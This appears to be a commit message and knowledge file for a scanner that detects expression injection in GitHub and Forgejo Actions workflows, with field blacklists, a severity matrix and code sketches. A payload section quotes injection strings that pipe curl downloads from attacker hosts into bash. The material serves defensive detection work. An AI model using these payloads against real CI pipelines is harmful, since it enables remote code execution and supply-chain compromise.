Kjell Tore Guttormsen c31d4b1718 feat(workflow-scanner): E11 part 1 — core file-walk + 23-field blacklist + sink-restriction

Adds a deterministic GitHub Actions / Forgejo Actions injection
scanner. Detects ${{ <dangerous-field> }} interpolations inside
`run:` step blocks under privileged or semi-privileged triggers.
Sink-restricted: `if:` / `with:` / `env:` (block-level) are
evaluated by the runner expression engine, not the shell, so they
are NOT injection sinks and are suppressed at parser level.

Why: workflow expression injection is the most prevalent SAST class
on GitHub (CodeQL preview: 800K+ findings across 158K repos). The
graduated severity matrix (HIGH for pull_request_target / discussion
/ workflow_run; MEDIUM for pull_request / workflow_dispatch) is the
community-converged calibration target — uniform HIGH causes alert
fatigue.

Components:
- scanners/lib/workflow-yaml-state.mjs — line-based YAML state
  machine. Tracks indentation, parent-context stack, and
  `run: |` / `run: >` block-scalar entry/exit. Zero deps.
- scanners/workflow-scanner.mjs — discoverWorkflows() probes
  .github/workflows/ and .forgejo/workflows/ directly (file-discovery
  has no glob include). 23-field blacklist (GHSL 17 + 6 GlueStack-
  class additions). Platform encoded via file path; no schema
  extension to finding(). Forgejo-specific: workflow_run advisory
  emitted to stderr; recommendation text mentions Forgejo's
  server-level token scoping (job-level permissions: is ignored).
- knowledge/workflow-injection-patterns.md — 23-field blacklist,
  trigger taxonomy, severity matrix, Forgejo divergences, NVD CVE
  corpus.

Tests (47 new):
- tests/lib/workflow-yaml-state.test.mjs (15): trigger forms
  (string / inline-list / block-list / block-mapping), single-line
  run, block-scalar | and > tracking, env/with sink-mismatch,
  multi-line, comment stripping, line-number accuracy.
- tests/scanners/workflow-scanner.test.mjs (14): TP head_ref
  pull_request_target, TP discussion.title gluestack pattern,
  TP comment.body pull_request, TP issue.body block-scalar,
  FP if-context, FP env-block, INFO numeric, Forgejo TP, Forgejo
  workflow_run advisory, envelope shape, WFL prefix.
- 9 fixtures in tests/fixtures/workflows/{.github,.forgejo}/workflows/.

Out of scope (B4 / Batch D):
- Re-interpolation detection (env.VAR after env: from blacklisted source)
- github.actor authorization-bypass category
- WFL prefix in severity.mjs OWASP maps + scan-orchestrator
  registration (B4)
- Composite-action input tracing, GITHUB_ENV poisoning (Batch D)

Test count: 1685 → 1732 (+47). Pre-compact-scan flake unchanged
(passes in isolation).

2026-04-30 15:48:48 +02:00

7.1 KiB


Workflow Injection Patterns (E11)

Knowledge file for scanners/workflow-scanner.mjs. Covers GitHub Actions and Forgejo Actions ${{ <expr> }} injection sinks inside run: step blocks. Sourced from .claude/projects/2026-04-29-batch-c-scope-finalize/research/01-github-forgejo-actions-injection.md (confidence 0.92, 51 sources).

Canonical 23-field blacklist

The community has converged on a blacklist (zizmor #1878) rather than a whitelist of safe fields. The 23 fields below are the v7.3.0 baseline — GitHub Security Lab's canonical 17-field list plus 6 GlueStack-class additions. All patterns match both github.* and forgejo.* prefixes (Forgejo aliases github.* to forgejo.* per its Reference docs).

GHSL canonical 17

github.event.issue.title
github.event.issue.body
github.event.pull_request.title
github.event.pull_request.body
github.event.pull_request.head.ref
github.event.pull_request.head.label
github.event.pull_request.head.repo.default_branch
github.event.comment.body
github.event.review.body
github.event.commits.*.message
github.event.commits.*.author.email
github.event.commits.*.author.name
github.event.head_commit.message
github.event.head_commit.author.email
github.event.head_commit.author.name
github.event.pages.*.page_name
github.head_ref

GlueStack-class additions (v7.3.0)

github.event.discussion.title           # CVE-2025-53104
github.event.discussion.body            # CVE-2025-53104
github.event.discussion.user.login      # CVE-2025-53104
github.event.inputs.*                   # workflow_dispatch — string inputs only
github.event.client_payload.*           # repository_dispatch
inputs.*                                # bare `inputs.<name>` (action-side / reusable workflow)
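
A minimal sketch of how the blacklist could be compiled into matchers. It assumes `*` stands for exactly one path segment and that the `forgejo.` alias applies wherever a pattern starts with `github.`. The names `BLACKLIST`, `compileField`, `isDangerousField`, and `extractExpressions` are hypothetical, only a subset of the 23 fields is listed, and this is not the code in scanners/workflow-scanner.mjs.

```javascript
// Hypothetical subset of the 23-field blacklist; `*` stands for one path segment.
const BLACKLIST = [
  'github.event.issue.title',
  'github.event.pull_request.head.ref',
  'github.event.commits.*.message',
  'github.event.discussion.title',
  'github.event.inputs.*',
  'inputs.*',
  'github.head_ref',
];

// Turn one dotted pattern into an anchored RegExp.
function compileField(pattern) {
  const body = pattern
    .split('.')
    .map((seg) => (seg === '*' ? '[^.\\s]+' : seg.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')))
    .join('\\.');
  // Accept the forgejo.* alias wherever the pattern starts with github.
  const aliased = body.replace(/^github\\\./, '(?:github|forgejo)\\.');
  return new RegExp(`^${aliased}$`);
}

const COMPILED = BLACKLIST.map(compileField);

// True when the expression body is exactly one blacklisted field path.
function isDangerousField(expr) {
  const field = expr.trim();
  return COMPILED.some((re) => re.test(field));
}

// Pull the body of every ${{ ... }} interpolation out of one line of text.
function extractExpressions(line) {
  return [...line.matchAll(/\$\{\{\s*(.*?)\s*\}\}/g)].map((m) => m[1]);
}
```

For example, `extractExpressions('echo "${{ github.head_ref }}"')` yields one expression body, which `isDangerousField` then flags. Exact-path matching is a deliberate simplification: expressions that wrap a field in a function call or index into an array would need extra handling.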

Severity matrix

| Tier | Field class | Trigger context | Severity |
| --- | --- | --- | --- |
| Privileged trigger | dangerous | `pull_request_target`, `issue_comment`, `discussion`, `discussion_comment`, `workflow_run` | HIGH |
| Semi-privileged trigger | dangerous | `pull_request`, `workflow_dispatch`, `repository_dispatch` | MEDIUM |
| Other / no trigger info | dangerous | (default fallback) | MEDIUM |
| Numeric / hex / fixed-string | safe | any | INFO (suppressed in summary) |
| Sink mismatch | (any) | `if:`, `with:`, `env:` (block-level), `name:`, `runs-on:`, `timeout-minutes:` | NOT injection; suppressed at parser level |
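
The matrix can be read as a small lookup. The sketch below is one possible encoding, assuming that a workflow with several triggers takes the tier of its most privileged one (an assumption, not something this file states). `severityFor` and the two set names are hypothetical.

```javascript
const PRIVILEGED = new Set([
  'pull_request_target', 'issue_comment', 'discussion',
  'discussion_comment', 'workflow_run',
]);
const SEMI_PRIVILEGED = new Set([
  'pull_request', 'workflow_dispatch', 'repository_dispatch',
]);

// fieldClass: 'dangerous' | 'safe'; triggers: names declared under `on:`.
function severityFor(fieldClass, triggers) {
  // Safe fields (numeric, hex, fixed-string) are INFO under any trigger.
  if (fieldClass === 'safe') return { tier: 'safe', severity: 'INFO' };
  // Assumption: the most privileged declared trigger decides the tier.
  if (triggers.some((t) => PRIVILEGED.has(t))) {
    return { tier: 'privileged', severity: 'HIGH' };
  }
  if (triggers.some((t) => SEMI_PRIVILEGED.has(t))) {
    return { tier: 'semi-privileged', severity: 'MEDIUM' };
  }
  // Unknown or missing trigger info falls back to MEDIUM.
  return { tier: 'fallback', severity: 'MEDIUM' };
}
```

Sink-mismatch contexts do not appear here because they are dropped before severity is ever computed.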

Safe fields (INFO-only, never injection sinks)

github.event.pull_request.number      # integer
github.event.pull_request.head.sha    # 40-char hex
github.run_id                         # server-assigned int
github.run_number                     # int
github.sha                            # 40-char hex
github.event.action                   # fixed string ("opened" / "closed" / …)
github.event.repository.full_name     # admin-controlled

Trigger taxonomy

Privileged (HIGH-severity matrix)

pull_request_target — runs on the BASE repo, has write tokens. The canonical "pwn-request" trigger.
issue_comment — fires on any new issue/PR comment. Attacker-supplied comment.body is shell-injectable.
discussion and discussion_comment — same shape as issue_comment, but the Discussion fields evade older zizmor whitelists. CVE-2025-53104 (gluestack) used ${{ github.event.discussion.title }}.
workflow_run — chained workflow trigger. Inherits BASE repo privileges. NOT documented for Forgejo Actions; Forgejo scans treat it as privileged for severity but emit a stderr advisory.

Semi-privileged (MEDIUM-severity matrix)

pull_request — read-only token from forks; still injectable, just less catastrophic.
workflow_dispatch — manual trigger with string inputs.*; CVE-2026-35580 (NSA Emissary) used this.
repository_dispatch — webhook-driven trigger with client_payload.*.
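
Which tier applies depends on the triggers a workflow declares under `on:`. The following is a rough, line-based sketch of collecting them from the four forms the test suite names (string, inline list, block list, block mapping). `parseTriggers` is a hypothetical helper and is far less thorough than the state machine in scanners/lib/workflow-yaml-state.mjs; it ignores anchors, flow mappings, and quoted values.

```javascript
// Hypothetical helper: returns the trigger names declared under the top-level `on:` key.
function parseTriggers(yamlText) {
  const lines = yamlText.split('\n');
  const start = lines.findIndex((l) => /^(on|"on"|'on'):/.test(l));
  if (start === -1) return [];

  // Same-line value: `on: push` or `on: [push, pull_request]`.
  const inline = lines[start].replace(/^[^:]+:/, '').replace(/\s#.*$/, '').trim();
  if (inline.startsWith('[')) {
    return inline.replace(/[\[\]]/g, '').split(',').map((s) => s.trim()).filter(Boolean);
  }
  if (inline) return [inline];

  // Block forms: `- push` items or `pull_request:` mapping keys.
  const triggers = [];
  let childIndent = null;
  for (const raw of lines.slice(start + 1)) {
    const text = raw.trim();
    if (text === '' || text.startsWith('#')) continue;
    const indent = raw.length - raw.trimStart().length;
    if (indent === 0 && !text.startsWith('-')) break; // next top-level key
    if (childIndent === null) childIndent = indent;
    if (indent !== childIndent) continue; // nested filters such as `branches:`
    const m = /^(?:-\s+)?([\w-]+)/.exec(text);
    if (m) triggers.push(m[1]);
  }
  return triggers;
}
```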

Sink restriction

Only run: step content (single-line or block-scalar | / >) is a shell injection sink. The runner expression engine evaluates expressions inside:

if: — boolean evaluation, no shell. (actionlint #443.)
with: — passed to action input; downstream action's responsibility.
env: (any level) — bound to env var; safe IF consumed via $VAR in the run script. Re-interpolation ${{ env.VAR }} inside run: cancels the mitigation (Appsmith CVE GHSL-2024-277).

The scanner suppresses findings whose parent is one of these contexts. The re-interpolation pattern is detected separately in B4.
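
To illustrate the sink restriction, here is a simplified sketch that collects only the text the shell will see: single-line `run:` values and the body of `run: |` / `run: >` block scalars. Everything else, including `if:`, `with:`, and `env:`, is never collected, so it cannot produce a finding. `findRunSinks` and `findInterpolatedSinks` are hypothetical names, and the indentation handling is a deliberately naive stand-in for the real parser.

```javascript
function findRunSinks(yamlText) {
  const sinks = [];
  let runKeyIndent = null; // column of the `run:` key while inside a block scalar
  yamlText.split('\n').forEach((raw, i) => {
    const text = raw.trim();
    const indent = raw.length - raw.trimStart().length;
    if (runKeyIndent !== null) {
      if (text === '') return; // blank lines stay inside the scalar
      if (indent > runKeyIndent) {
        sinks.push({ line: i + 1, text });
        return;
      }
      runKeyIndent = null; // a dedent closes the block scalar
    }
    const m = /^(?:-\s+)?run:\s*(.*)$/.exec(text);
    if (!m) return;
    if (/^[|>][+\-\d]{0,2}$/.test(m[1])) {
      runKeyIndent = raw.indexOf('run:'); // block scalar header
    } else if (m[1] !== '') {
      sinks.push({ line: i + 1, text: m[1] }); // single-line run
    }
  });
  return sinks;
}

// Keep only shell-visible lines that still contain a ${{ ... }} interpolation.
function findInterpolatedSinks(yamlText) {
  return findRunSinks(yamlText).filter((s) => /\$\{\{.*?\}\}/.test(s.text));
}

const workflow = [
  'on: pull_request_target',
  'jobs:',
  '  greet:',
  '    runs-on: ubuntu-latest',
  '    steps:',
  '      - name: greet',
  "        if: ${{ github.event.issue.title != '' }}",
  '        env:',
  '          TITLE: ${{ github.event.issue.title }}',
  '        run: |',
  '          echo "$TITLE"',
  '          echo "${{ github.event.issue.title }}"',
  '      - run: echo ${{ github.head_ref }}',
].join('\n');

const findings = findInterpolatedSinks(workflow);
```

In this sample only lines 12 and 13 are reported. The `if:` and `env:` interpolations on lines 7 and 9 are skipped, and `echo "$TITLE"` on line 11 is shell-visible but contains no template expression.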

Forgejo divergences

| Item | GitHub | Forgejo | Scanner implication |
| --- | --- | --- | --- |
| Primary context | `github.*` | `forgejo.*` (alias `github.*`) | Match both prefixes |
| Job-level `permissions:` | Enforced | Ignored | Recommendation text mentions Forgejo's server-level token scoping instead |
| `workflow_run` trigger | Supported | Likely unsupported | Stderr advisory emitted; severity logic still applies |
| OIDC | `permissions: id-token: write` | `enable-openid-connect` | Out of scope for E11 |

The scanner detects platform from file path (.forgejo/workflows/ → forgejo, .github/workflows/ → github). Both directories are scanned independently when both exist; there is no fallback from one to the other (documented design choice — the v7.3.0 plan locked this in to avoid over-confident mitigation guidance for Forgejo).
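
Path-based platform detection could look roughly like the sketch below. `detectPlatform` is a hypothetical name, and the restriction to `.yml` / `.yaml` files directly inside the workflows directory is an assumption made for the example.

```javascript
// Returns 'forgejo', 'github', or null for paths outside both workflow directories.
function detectPlatform(filePath) {
  const p = filePath.replace(/\\/g, '/'); // normalise Windows separators
  if (/(^|\/)\.forgejo\/workflows\/[^/]+\.ya?ml$/.test(p)) return 'forgejo';
  if (/(^|\/)\.github\/workflows\/[^/]+\.ya?ml$/.test(p)) return 'github';
  return null;
}
```

Because the two checks are independent, a repository that contains both directories gets each file labelled by its own path, with no fallback between platforms.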

Real-world payload shapes (v7.3.0 reference)

${IFS} brace-expansion (Ultralytics CVE-2024): openimbot:$({curl,-sSfL,raw...}${IFS}|${IFS}bash)
Quote-break + curl (ultralytics GHSA-7x29-qqmq-v6qc): Hacked";{curl,-sSfL,gist...}${IFS}|${IFS}bash
Discussion title $() substitution (gluestack CVE-2025-53104): $(curl -sSfL attacker.com/exfil.sh | bash)
workflow_dispatch shell-break (Emissary CVE-2026-35580): 1.0.0"; curl attacker.com/backdoor.sh | bash; echo "

Single-quote shell escaping provides ZERO protection — template substitution happens BEFORE shell parsing (Ken Muse, Appsmith CVE).
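
The ordering problem can be reproduced with a toy substitution. The sketch below imitates the runner's textual replacement with a plain string replace; `renderTemplate` is a hypothetical stand-in, not the real expression engine, and the payload and `attacker.example` host are invented for illustration.

```javascript
// Toy model: replace each ${{ path }} with the matching context value, as plain text.
function renderTemplate(script, context) {
  return script.replace(/\$\{\{\s*([\w.]+)\s*\}\}/g, (_, path) => String(context[path] ?? ''));
}

const context = {
  'github.event.issue.title': "x'; curl attacker.example/x.sh | bash; echo '",
};

// Unsafe: the title is pasted into the script before the shell parses the quotes.
const unsafe = renderTemplate("echo '${{ github.event.issue.title }}'", context);

// Safer: the script only references an env var, so rendering leaves it untouched.
const safe = renderTemplate('echo "$TITLE"', context);
```

After rendering, `unsafe` is `echo 'x'; curl attacker.example/x.sh | bash; echo ''`, so the attacker's quote closes the string and the rest runs as separate commands. `safe` stays `echo "$TITLE"`, and the value only reaches the shell as variable data.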

Confirmed CVE corpus (NVD / vendor-confirmed)

CVE-2023-49291 — tj-actions/branch-names ≤7.0.6 (CRITICAL 9.3)
CVE-2025-30066 — tj-actions/changed-files (HIGH 8.6, CISA KEV)
CVE-2025-30154 — reviewdog/action-setup v1 (HIGH 8.6, CISA KEV)
CVE-2025-53104 — gluestack-ui (CRITICAL 9.1, Discussion vector)
CVE-2025-61671 — Microsoft Symphony (CRITICAL 9.3)
CVE-2026-33475 — langflow-ai/langflow (CRITICAL 9.1)
CVE-2026-35580 — NSA Emissary (CRITICAL 9.x, April 2026)
CVE-2026-3854 — GitHub.com / GHES ≤3.19.2 platform-level (HIGH 8.7)

The April 2026 elementary-data PyPI compromise (Gemini second opinion) is on a watch-list pending NVD/StepSecurity confirmation.

Out of scope (deferred to Batch D / v8.0.0)

Composite-action input tracing
Reusable-workflow call analysis
GITHUB_ENV poisoning detection (LegitSecurity, CodeQL actions-envvar-injection-critical)
Zombie-workflow scanning across non-default branches
IssueOps TOCTOU (SHA at comment time vs review time)
Authorization-bypass class for github.actor checks (Synacktiv 2023 Dependabot spoofing) — added in B4 as a separate finding category.
